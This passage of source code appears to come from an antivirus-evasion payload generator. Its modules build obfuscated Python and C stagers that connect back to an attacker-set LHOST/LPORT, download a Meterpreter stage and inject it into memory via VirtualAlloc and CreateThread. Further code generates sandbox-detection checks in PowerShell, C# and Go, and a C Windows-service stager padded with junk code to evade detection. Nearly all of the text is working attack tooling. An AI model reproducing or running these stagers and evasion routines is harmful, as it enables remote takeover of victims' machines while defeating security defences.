((New-Object DateTime(1900,1,1,0,0,0,[DateTimeKind]::Utc)).AddMilliseconds([UInt64]($runTotal*1000)).Second - $firstTime -ge " + evasion_payload.required_options["SLEEP"][0] + " -or $noAccess) {\n" num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'cs': if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() # Create Payload code check_code += '\t' * num_tabs_required + 'DateTime {} = DateTime.Today;\n'.format(RandToday) check_code += '\t' * num_tabs_required + 'DateTime {} = {}.AddDays({});\n'.format(RandExpire, RandToday, evasion_payload.required_options["EXPIRE_PAYLOAD"][0]) check_code += '\t' * num_tabs_required + 'if ({} < {}) {{\n'.format(RandExpire, RandToday) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(evasion_payload.required_options["HOSTNAME"][0].lower()) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(evasion_payload.required_options["PROCESSORS"][0]) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() rand_char_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(rand_user_name) check_code += '\t' * num_tabs_required + "string[] {} = {}.Split('\\\\');\n".format(rand_char_name, rand_user_name) check_code += '\t' * num_tabs_required + 'if ({}[1].Contains("{}")) {{\n\n'.format(rand_char_name, evasion_payload.required_options["USERNAME"][0]) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["SLEEP"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'var NTPTransmit = new byte[48];NTPTransmit[0] = 0x1B; var secondTransmit = new byte[48]; secondTransmit[0] = 0x1B; var skip = false;\n' check_code += '\t' * num_tabs_required + 'var addr = Dns.GetHostEntry("us.pool.ntp.org").AddressList;var sock = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);\n' check_code += '\t' * num_tabs_required + 'try { sock.Connect(new IPEndPoint(addr[0], 123)); sock.ReceiveTimeout = 6000; sock.Send(NTPTransmit); sock.Receive(NTPTransmit); sock.Close(); } catch { skip = true; }\n' check_code += '\t' * num_tabs_required + 'ulong runTotal=0;for (int i=40; i<=43; ++i){runTotal = runTotal * 256 + (uint)NTPTransmit[i];}\n' check_code += '\t' * num_tabs_required + 'var t1 = (new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(1000 * runTotal);\n' check_code += '\t' * num_tabs_required + 'Thread.Sleep(' + evasion_payload.required_options["SLEEP"][0] + '*1000);\n' check_code += '\t' * num_tabs_required + 'var newSock = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);\n' check_code += '\t' * num_tabs_required + 'try { var addr2 = Dns.GetHostEntry("us.pool.ntp.org").AddressList; newSock.Connect(new IPEndPoint(addr2[0], 123)); newSock.ReceiveTimeout = 6000; newSock.Send(secondTransmit); newSock.Receive(secondTransmit); newSock.Close(); } catch { skip = true; }\n' check_code += '\t' * num_tabs_required + 'ulong secondTotal = 0; for (int i = 40; i <= 43; ++i) { secondTotal = secondTotal * 256 + (uint)secondTransmit[i]; }\n' check_code += '\t' * num_tabs_required + 'if (((new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(1000 * secondTotal) - t1).Seconds >= ' + evasion_payload.required_options["SLEEP"][0] + ' || skip) {\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'go': rand_username = evasion_helpers.randomString() rand_error1 = evasion_helpers.randomString() rand_hostname = evasion_helpers.randomString() rand_error2 = evasion_helpers.randomString() rand_processor = evasion_helpers.randomString() rand_domain = evasion_helpers.randomString() if evasion_payload.required_options["USERNAME"][0].lower() != "x": check_code += rand_username + ", " + rand_error1 + " := user.Current()\n" check_code += "if " + rand_error1 + " != nil {\n" check_code += "os.Exit(1)}\n" check_code += "if strings.Contains(strings.ToLower(" + rand_username + ".Username), strings.ToLower(\"" + evasion_payload.required_options["USERNAME"][0] + "\")) {\n" num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += rand_hostname + ", " + rand_error2 + " := os.Hostname()\n" check_code += "if " + rand_error2 + " != nil {\n" check_code += "os.Exit(1)}\n" check_code += "if strings.Contains(strings.ToLower(" + rand_hostname + "), strings.ToLower(\"" + evasion_payload.required_options["HOSTNAME"][0] + "\")) {\n" num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": check_code += rand_processor + " := runtime.NumCPU()\n" check_code += "if " + rand_processor + " >= " + evasion_payload.required_options["PROCESSORS"][0] + " {\n" num_tabs_required += 1 if evasion_payload.required_options["SLEEP"][0].lower() != "x": check_code += 'type ntp_struct struct {FirstByte,A,B,C uint8;D,E,F uint32;G,H uint64;ReceiveTime uint64;J uint64}\n' check_code += 'sock,_ := net.Dial("udp", "us.pool.ntp.org:123");sock.SetDeadline(time.Now().Add((6*time.Second)));defer sock.Close()\n' check_code += 'ntp_transmit := new(ntp_struct);ntp_transmit.FirstByte=0x1b\n' check_code += 'binary.Write(sock, binary.BigEndian, ntp_transmit);binary.Read(sock, binary.BigEndian, ntp_transmit)\n' check_code += 'val := time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((ntp_transmit.ReceiveTime >> 32)*1000000000)))\n' check_code += 'time.Sleep(time.Duration(' + evasion_payload.required_options["SLEEP"][0] + '*1000) * time.Millisecond)\n' check_code += 'newsock,_ := net.Dial("udp", "us.pool.ntp.org:123");newsock.SetDeadline(time.Now().Add((6*time.Second)));defer newsock.Close()\n' check_code += 'second_transmit := new(ntp_struct);second_transmit.FirstByte=0x1b\n' check_code += 'binary.Write(newsock, binary.BigEndian, second_transmit);binary.Read(newsock, binary.BigEndian, second_transmit)\n' check_code += 'if int(time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((second_transmit.ReceiveTime >> 32)*1000000000))).Sub(val).Seconds()) >= ' + evasion_payload.required_options["SLEEP"][0] + ' {' num_tabs_required += 1 # Return check information return check_code, num_tabs_required else: return '', 0
def generate(self): payload_code = "import urllib.request, string, random, struct, ctypes, time, ssl\n" # randomize everything, yo' sumMethodName = evasion_helpers.randomString() checkinMethodName = evasion_helpers.randomString() randLettersName = evasion_helpers.randomString() randLetterSubName = evasion_helpers.randomString() randBaseName = evasion_helpers.randomString() downloadMethodName = evasion_helpers.randomString() hostName = evasion_helpers.randomString() portName = evasion_helpers.randomString() requestName = evasion_helpers.randomString() tName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() dataName = evasion_helpers.randomString() byteArrayName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() bufName = evasion_helpers.randomString() handleName = evasion_helpers.randomString() data2Name = evasion_helpers.randomString() proxy_var = evasion_helpers.randomString() opener_var = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() # How I'm tracking the number of nested tabs needed # to make the payload num_tabs_required = 0 payload_code = '' if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Create Payload code payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n' payload_code += '\t' * num_tabs_required + 'from datetime import date\n' payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n' payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["HOSTNAME"][0].lower() != "x": rand_hostname = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import platform\n' payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n' payload_code += '\t' * num_tabs_required + 'if ' + rand_hostname + ' in \"' + self.required_options[ "HOSTNAME"][0] + '\":\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["DOMAIN"][0].lower() != "x": rand_domain = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import socket\n' payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n' payload_code += '\t' * num_tabs_required + 'if ' + rand_domain + ' in \"' + self.required_options[ "DOMAIN"][0] + '\":\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["PROCESSORS"][0].lower() != "x": rand_processor_count = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import multiprocessing\n' payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n' payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options[ "PROCESSORS"][0] + ':\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import getpass\n' payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n' payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options[ "USERNAME"][ 0] + '\'.lower() in ' + rand_user_name + '.lower():\n' # Add a tab for this check num_tabs_required += 1 # helper method that returns the sum of all ord values in a string % 0x100 payload_code += "ssl._create_default_https_context = ssl._create_unverified_context\n" payload_code += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" % ( sumMethodName) # method that generates a new checksum value for checkin to the meterpreter handler payload_code += "def %s():\n\tfor x in range(64):\n" % ( checkinMethodName) payload_code += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" % ( randBaseName) payload_code += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" % ( randLettersName) payload_code += "\t\tfor %s in %s:\n" % (randLetterSubName, randLettersName) payload_code += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" % ( sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName) # method that connects to a host/port over https and downloads the hosted data payload_code += "def %s(%s,%s):\n" % (downloadMethodName, hostName, portName) payload_code += "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n" payload_code += "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n" payload_code += "\turllib.request.install_opener(" + opener_var + ")\n" payload_code += "\t%s = urllib.request.Request(\"https://%%s:%%s/%%s\" %%(%s,%s,%s()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" % ( requestName, hostName, portName, checkinMethodName) payload_code += "\ttry:\n" payload_code += "\t\t%s = urllib.request.urlopen(%s)\n" % (tName, requestName) payload_code += "\t\ttry:\n" payload_code += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" % ( tName, tName) payload_code += "\t\t\telse: return ''\n" payload_code += "\t\texcept: return %s.read()\n" % (tName) payload_code += "\texcept urllib.request.URLError: return ''\n" # method to inject a reflective .dll into memory payload_code += "def %s(%s):\n" % (injectMethodName, dataName) payload_code += "\tif %s != \"\":\n" % (dataName) payload_code += "\t\t%s = bytearray(%s)\n" % (byteArrayName, dataName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n" payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + ptrName + ")," + bufName + ", " + randctypes + ".c_int(len(" + byteArrayName + ")))\n" payload_code += '\t' * num_tabs_required + "\t\t" + handleName + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + ptrName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + handleName + ")," + randctypes + ".c_int(-1))\n" # Assuming heap injection else: HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + byteArrayName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + byteArrayName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + bufName + ' = (' + randctypes + '.c_char * len(' + byteArrayName + ')).from_buffer(' + byteArrayName + ')\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + ptrName + '),' + bufName + ',' + randctypes + '.c_int(len(' + byteArrayName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + ptrName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n' # download the metpreter .dll and inject it payload_code += "%s = ''\n" % (data2Name) payload_code += "%s = %s(\"%s\", %s)\n" % ( data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payload_code += "%s(%s)\n" % (injectMethodName, data2Name) if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # randomize all of the variable names used shellCodeName = evasion_helpers.randomString() socketName = evasion_helpers.randomString() getDataMethodName = evasion_helpers.randomString() fdBufName = evasion_helpers.randomString() rcvStringName = evasion_helpers.randomString() rcvCStringName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() tempShellcodeName = evasion_helpers.randomString() shellcodeBufName = evasion_helpers.randomString() fpName = evasion_helpers.randomString() tempCBuffer = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() payload_code = "import struct, socket, binascii, ctypes as " + randctypes + ", random, time\n" # How I'm tracking the number of nested tabs needed # to make the payload num_tabs_required = 0 payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # socket and shellcode variables that need to be kept global payload_code += '\t' * num_tabs_required + "%s, %s = None, None\n" % ( shellCodeName, socketName) # build the method that creates a socket, connects to the handler, # and downloads/patches the meterpreter .dll payload_code += '\t' * num_tabs_required + "def %s():\n" % ( getDataMethodName) payload_code += '\t' * num_tabs_required + "\ttry:\n" payload_code += '\t' * num_tabs_required + "\t\tglobal %s\n" % ( socketName) # build the socket and connect to the handler payload_code += '\t' * num_tabs_required + "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % ( socketName) payload_code += '\t' * num_tabs_required + "\t\t%s.connect(('%s', %s))\n" % ( socketName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) # pack the underlying socket file descriptor into a c structure payload_code += '\t' * num_tabs_required + "\t\t%s = struct.pack('<i', %s.fileno())\n" % ( fdBufName, socketName) # unpack the length of the payload, received as a 4 byte array from the handler payload_code += '\t' * num_tabs_required + "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" % ( socketName) payload_code += '\t' * num_tabs_required + "\t\t%s = b\" \"\n" % ( rcvStringName) # receive ALL of the payload .dll data payload_code += '\t' * num_tabs_required + "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % ( rcvStringName, rcvStringName, socketName) payload_code += '\t' * num_tabs_required + "\t\t" + rcvCStringName + " = " + randctypes + ".create_string_buffer(%s, len(%s))\n" % ( rcvStringName, rcvStringName) # prepend a little assembly magic to push the socket fd into the edi register payload_code += '\t' * num_tabs_required + "\t\t%s[0] = binascii.unhexlify('BF')\n" % ( rcvCStringName) # copy the socket fd in payload_code += '\t' * num_tabs_required + "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % ( rcvCStringName, fdBufName) payload_code += '\t' * num_tabs_required + "\t\treturn %s\n" % ( rcvCStringName) payload_code += '\t' * num_tabs_required + "\texcept: return None\n" # build the method that injects the .dll into memory payload_code += '\t' * num_tabs_required + "def %s(%s):\n" % ( injectMethodName, tempShellcodeName) payload_code += '\t' * num_tabs_required + "\tif %s != None:\n" % ( tempShellcodeName) payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" % ( shellcodeBufName, tempShellcodeName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": # allocate enough virtual memory to stuff the .dll in payload_code += "\t\t" + fpName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + shellcodeBufName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" # virtual lock to prevent the memory from paging out to disk payload_code += "\t\t" + tempCBuffer + " = (" + randctypes + ".c_char * len(" + shellcodeBufName + ")).from_buffer(" + shellcodeBufName + ")\n" # copy the .dll into the allocated memory payload_code += "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + fpName + "), " + tempCBuffer + ", " + randctypes + ".c_int(len(" + shellcodeBufName + ")))\n" # kick the thread off to execute the .dll payload_code += "\t\tht = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + fpName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" # wait for the .dll execution to finish payload_code += "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(ht)," + randctypes + ".c_int(-1))\n" # Assume HEAP Injection else: HeapVar = evasion_helpers.randomString() handleName = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + shellcodeBufName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + "\t\t" + fpName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + shellcodeBufName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + tempCBuffer + ' = (' + randctypes + '.c_char * len(' + shellcodeBufName + ')).from_buffer(' + shellcodeBufName + ')\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + fpName + '),' + tempCBuffer + ',' + randctypes + '.c_int(len(' + shellcodeBufName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + fpName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n' # download the stager payload_code += '\t' * num_tabs_required + "%s = %s()\n" % ( shellCodeName, getDataMethodName) # inject what we grabbed payload_code += '\t' * num_tabs_required + "%s(%s)\n" % ( injectMethodName, shellCodeName) if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): winsock_init_name = evasion_helpers.randomString() punt_name = evasion_helpers.randomString() recv_all_name = evasion_helpers.randomString() wsconnect_name = evasion_helpers.randomString() # the real includes needed includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>"] # max length string for obfuscation global_max_string_length = 10000 max_string_length = random.randint(100,global_max_string_length) max_num_strings = 10000 # TODO: add in more string processing functions randName1 = evasion_helpers.randomString() # reverse() randName2 = evasion_helpers.randomString() # doubles characters stringModFunctions = [ (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)), (randName2, "char* %s(char* s){ char *result = malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2)) ] random.shuffle(stringModFunctions) # obsufcation - "logical nop" string generation functions randString1 = evasion_helpers.randomString(50) randName1 = evasion_helpers.randomString() randVar1 = evasion_helpers.randomString() randName2 = evasion_helpers.randomString() randVar2 = evasion_helpers.randomString() randVar3 = evasion_helpers.randomString() randName3 = evasion_helpers.randomString() randVar4 = evasion_helpers.randomString() randVar5 = evasion_helpers.randomString() stringGenFunctions = [ (randName1, "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}" %(randName1, randVar1, stringModFunctions[0][0], randString1, randVar1, randString1[25])), (randName2, "char* %s(){ char %s[%s], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }" % (randName2, randVar2, max_string_length, randVar3, max_string_length, randVar2, evasion_helpers.randomString(50), randVar3, evasion_helpers.randomString(50), stringModFunctions[1][0], randVar2, randVar3)), (randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, evasion_helpers.randomString(50), randVar5, randVar4, randVar5)) ] random.shuffle(stringGenFunctions) # obfuscation - add in our fake includes fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>", "#include <limits.h>", "#include <assert.h>"] for x in range(1, random.randint(1,7)): includes.append(fake_includes[x]) # obsufcation - shuffle up our real and fake includes random.shuffle(includes) code = "#define _WIN32_WINNT 0x0500\n" code += "#include <winsock2.h>\n" code += "\n".join(includes) + "\n" # real - service related headers (check the stub) hStatusName = evasion_helpers.randomString() serviceHeaders = ["SERVICE_STATUS ServiceStatus;","SERVICE_STATUS_HANDLE %s;" %(hStatusName), "void ServiceMain(int argc, char** argv);", "void ControlHandler(DWORD request);"] random.shuffle(serviceHeaders) code += "\n".join(serviceHeaders) # obsufcation - string mod functions code += stringModFunctions[0][1] + "\n" code += stringModFunctions[1][1] + "\n" # real - build the winsock_init function wVersionRequested_name = evasion_helpers.randomString() wsaData_name = evasion_helpers.randomString() code += "void %s() {" % (winsock_init_name) code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, evasion_helpers.obfuscateNum(2,4),evasion_helpers.obfuscateNum(2,4), wsaData_name) code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name) # first logical nop string function code += stringGenFunctions[0][1] + "\n" # real - build punt function my_socket_name = evasion_helpers.randomString() code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name) code += "closesocket(%s);" %(my_socket_name) code += "WSACleanup();" code += "exit(1);}\n" # obsufcation - second logical nop string function code += stringGenFunctions[1][1] + "\n" # real - build recv_all function my_socket_name = evasion_helpers.randomString() buffer_name = evasion_helpers.randomString() len_name = evasion_helpers.randomString() code += "int %s(SOCKET %s, void * %s, int %s){" %(recv_all_name, my_socket_name, buffer_name, len_name) code += "int slfkmklsDSA=0;int rcAmwSVM=0;" code += "void * startb = %s;" %(buffer_name) code += "while (rcAmwSVM < %s) {" %(len_name) code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" %(my_socket_name, len_name) code += "startb += slfkmklsDSA; rcAmwSVM += slfkmklsDSA;" code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" %(punt_name, my_socket_name) # obsufcation - third logical nop string function code += stringGenFunctions[2][1] + "\n" # real - build wsconnect function target_name = evasion_helpers.randomString() sock_name = evasion_helpers.randomString() my_socket_name = evasion_helpers.randomString() code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (wsconnect_name, target_name, sock_name, my_socket_name) code += "%s = socket(AF_INET, SOCK_STREAM, 0);" %(my_socket_name) code += "if (%s == INVALID_SOCKET) %s(%s);" %(my_socket_name, punt_name, my_socket_name); code += "%s = gethostbyname(\"%s\");" %(target_name, self.required_options["LHOST"][0]) code += "if (%s == NULL) %s(%s);" %(target_name, punt_name, my_socket_name) code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" %(sock_name, target_name, target_name) code += "%s.sin_family = AF_INET;" %(sock_name) code += "%s.sin_port = htons(%s);" %(sock_name, evasion_helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32)) code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name) code += "return %s;}\n" %(my_socket_name) # real - main() method for the service code serviceName = evasion_helpers.randomString() code += "void main() { SERVICE_TABLE_ENTRY ServiceTable[2];" serviceTableEntries = [ "ServiceTable[0].lpServiceName = \"%s\";" %(serviceName), "ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;", "ServiceTable[1].lpServiceName = NULL;", "ServiceTable[1].lpServiceProc = NULL;"] random.shuffle(serviceTableEntries) code += "\n".join(serviceTableEntries) code += "StartServiceCtrlDispatcher(ServiceTable);}\n" # real - service status options for us to shuffle serviceStatusOptions = ["ServiceStatus.dwWin32ExitCode = 0;", "ServiceStatus.dwCurrentState = SERVICE_START_PENDING;", "ServiceStatus.dwWaitHint = 0;", "ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;", "ServiceStatus.dwServiceSpecificExitCode = 0;", "ServiceStatus.dwCheckPoint = 0;", "ServiceStatus.dwServiceType = SERVICE_WIN32;"] random.shuffle(serviceStatusOptions) # real - serviceMain() code code += "void ServiceMain(int argc, char** argv) {\n" code += "\n".join(serviceStatusOptions) code += "%s = RegisterServiceCtrlHandler( \"%s\", (LPHANDLER_FUNCTION)ControlHandler);" %(hStatusName, serviceName) code += "if (%s == (SERVICE_STATUS_HANDLE)0) return;" %(hStatusName) code += "ServiceStatus.dwCurrentState = SERVICE_RUNNING;" code += "SetServiceStatus (%s, &ServiceStatus);" %(hStatusName) code += "while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {\n" # obsufcation - random variable names size_name = evasion_helpers.randomString() buffer_name = evasion_helpers.randomString() function_name = evasion_helpers.randomString() my_socket_name = evasion_helpers.randomString() count_name = evasion_helpers.randomString() # obsufcation - necessary declarations char_array_name_1 = evasion_helpers.randomString() number_of_strings_1 = random.randint(1,max_num_strings) char_array_name_2 = evasion_helpers.randomString() number_of_strings_2 = random.randint(1,max_num_strings) char_array_name_3 = evasion_helpers.randomString() number_of_strings_3 = random.randint(1,max_num_strings) # real - necessary declarations code += "ULONG32 %s;" %(size_name) code += "char * %s;" %(buffer_name) code += "int i;" code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1) code += "void (*%s)();" %(function_name) # obsufcation - malloc our first string obfuscation array code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length)) code += "%s();" %(winsock_init_name) code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2) code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name) # obsufcation - malloc our second string obfuscation array code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length)) # real - receive the 4 byte size from the handler code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (count_name, my_socket_name, size_name, evasion_helpers.obfuscateNum(4,2)) # real - punt the socket if something goes wrong code += "if (%s != %s || %s <= 0) %s(%s);" %(count_name, evasion_helpers.obfuscateNum(4,2), size_name, punt_name, my_socket_name) # real - virtual alloc space for the meterpreter .dll code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name, size_name, evasion_helpers.obfuscateNum(5,2)) # obsufcation - declare space for our 3 string obfuscation array code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3) # obsufcation - 